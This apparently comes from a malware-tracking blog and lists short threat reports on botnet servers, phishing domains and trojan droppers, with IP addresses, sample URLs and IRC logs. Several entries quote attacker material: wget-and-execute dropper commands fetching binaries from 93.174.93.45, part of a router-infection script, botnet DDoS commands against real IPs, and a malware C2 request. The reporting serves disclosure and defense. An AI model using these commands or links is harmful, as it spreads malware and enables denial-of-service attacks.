This is spreading through torrents and cracks and looks like passwd stealer. Domains and ip’s used : makemegood24.com 213.165.83.176 e710e2.makemegood24.com 87.106.20.192 aaakemegood24.com 146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com 74.208.153.9 acakemegood24.com 87.106.20.192 adakemegood24.com 213.165.83.176 aeakemegood24.com 74.208.164.166 afakemegood24.com perfectchoice1.com Read more...
185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)
Another SDT botnet found by abigail. Server : 185.61.138.235 Port : 443 Channel : #secgod DDOS Coming Up : <~Broken> >bot +std 70.127.120.174 80 30 [STD]Hitting 70.127.120.174! [STD]Done hitting 70.127.120.174! <~Broken> >bot +stop Killing pid 13923. Other url : http://93.174.93.45/f.sh #!/bin/sh cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh cd /tmp && wget http://93.174.93.45/mox64Read more...
191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)
Found by abigail Server : 191.235.178.122 Port 443 Channel : #sh DDOS Coming Up lol : <~Haze> >bot +std 172.56.41.67 80 120 [STD]Hitting 172.56.41.67! [STD]Hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! The Bot u can download it here. Other : http://5.152.206.162/getbinaries.sh #!/bin/sh # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOURRead more...
jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)
Domains used by the malware: 34324325kgkgfkgf.com dsffdsk323721372131.com fdshjfsh324332432.com jdsiwiqweiqwyreqwi.com 80.242.123.208 HTTP Requests: URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: jdsiwiqweiqwyreqwi.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples:Read more...
89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Botnet found by sPy. Only server and port no channels here because no exe file to see for more. Feel free to check for channels ur self. Connecting to 89.248.172.240 (6667) Invisible Users 12: 12 3554Operators: 2 operator(s) onlineChannels: 12 channels formedClients: I have 3555 clients and 0 serversLocal users: 3555 29989 Current local usersRead more...
Linux Botnet Hosted In blackunix.us
This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV Now talking in #botnets Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ] Topic By : [ uyap ] Modes On : [ #botnets ] [ +smntrMuk fcuked ] The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log
onetimes27s.com(Reverse Dns Bot hosted in Russian Federation Saint Petersburg Majordomo Llc)
This package was posted in one hacking board as http bot. After checking the file here results: Domains used : hoseen454r.com inactive onetimes27s.com active Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ] Panel: hxxp://178.250.245.186/pref1/ password protected Sample here Hosting infos: http://whois.domaintools.com/178.250.245.186
btctycoon.net(Betabot hosted in Canada Montreal Ovh Hosting Inc.)
Thanks to Xylitol for infos. Resolved : [btctycoon.net] To [192.99.21.12] Other : hxxp://www.btctycoon.net/info/blah.php Sample: hxxp://www.btctycoon.net/webapps/BTCclient.exe Hosting Infos : http://whois.domaintools.com/192.99.21.12
static.onlineapplicationsdownloads.com(Trojan downloader spreading via Facebook hosted in United States Ashburn Amazon.com Inc. )
Our friend aLiSs found this file via facebook. These links are spreading on facebook. hxxp://goo.gl/TUqGzM hxxp://goo.gl/PVUW3S hxxp://goo.gl/uJvgqv When u click u go to the page and then u are asked to install FlvPlayer if u click install u are downloading FlvPlayerSetup.exe wich download and installs FlvPlayerSilent0.exe. These are domains used by this shit os.greatonlineapplications.com static.onlineapplicationsdownloads.comRead more...
informed.su(Paypal Phishing Page)
I was looking into spam area in my gmail account and i saw this mesage: Update Personal Information Dear Valued Customer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud onRead more...